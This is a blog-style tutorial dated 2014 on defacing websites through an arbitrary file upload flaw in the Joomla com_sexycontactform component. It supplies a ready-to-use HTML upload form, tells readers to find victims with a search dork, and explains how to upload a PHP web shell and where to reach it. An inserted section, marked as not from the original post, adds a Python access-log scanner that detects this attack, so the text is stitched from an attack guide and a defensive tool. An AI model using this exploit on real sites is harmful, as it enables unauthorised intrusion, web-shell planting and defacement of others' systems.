
Defacing with the Joomla com_sexycontactform Arbitrary File Upload Vulnerability Exploit

October 27, 2014 by Jack Wilder

Okay, this time I want to share an exploit I got yesterday. Actually there are still plenty of untouched targets, but since I want to quit this scene, lol, I'll just share the tutorial. Hopefully it's useful for those who are still into defacing.
Okay, first, prepare the HTML exploiter.
<form method="POST" action="http://localhost/components/com_sexycontactform//fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

Save it with the .html extension.
Then search Google with a dork.
Dork : ??
Use ur brain, bitch !!
The victim is at:
http://localhost/components/com_sexycontactform//fileupload/index.php

Once you have found a target, edit the HTML exploit from earlier: replace http://localhost with the target site.

Then open that HTML file in a browser.

There is an upload form. Upload the shell through it.

If some kind of messy, unclear notice appears, that means the shell was uploaded successfully.

The shell is at http://localhost/components/com_sexycontactform//fileupload/files/shell.php
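
The two requests described above leave a recognizable trail in web server logs. The following is an added example, not part of the original post: a Python scan of access logs for POSTs to the component's upload endpoint and for script files requested from its files/ directory. The combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Paths taken from the post; duplicate slashes are collapsed before matching.
UPLOAD = "/components/com_sexycontactform/fileupload/index.php"
FILES = "/components/com_sexycontactform/fileupload/files/"
# Script extensions, including double extensions such as shell.php.jpg.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|/|$)")
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')

def normalize(target):
    """Drop the query string, URL-decode, collapse '//' and lowercase the path."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path).lower()

def scan(lines):
    """Return findings as (kind, client, timestamp, path) tuples."""
    findings, uploaders = [], set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format line
        client, ts, method, target, status = m.groups()
        path = normalize(target)
        if method == "POST" and path == UPLOAD:
            uploaders.add(client)
            findings.append(("upload_attempt", client, ts, path))
        elif path.startswith(FILES) and SCRIPT_EXT.search(path[len(FILES):]):
            # A 2xx script response to a client that just uploaded is the strongest signal.
            hit = client in uploaders and status.startswith("2")
            findings.append(("script_hit_after_upload" if hit else "script_request",
                             client, ts, path))
    return findings

# Constructed sample lines (combined log format), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [27/Oct/2014:10:01:02 +0000] "POST /components/com_sexycontactform//fileupload/index.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [27/Oct/2014:10:01:09 +0000] "GET /components/com_sexycontactform//fileupload/files/shell.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [27/Oct/2014:10:05:00 +0000] "GET /components/com_sexycontactform/fileupload/files/photo.jpg HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [27/Oct/2014:10:06:00 +0000] "GET /components/com_sexycontactform/fileupload/files/x.PHP5 HTTP/1.1" 404 0 "-" "curl/7.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding, sep="\t")
```

A `script_hit_after_upload` finding means a script in the upload directory was served with a 2xx status to the same client that posted to the endpoint, so that directory should be checked on disk and script execution disabled there.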

That's all for this tutorial, hopefully it's useful.
Happy Hacking ^_^
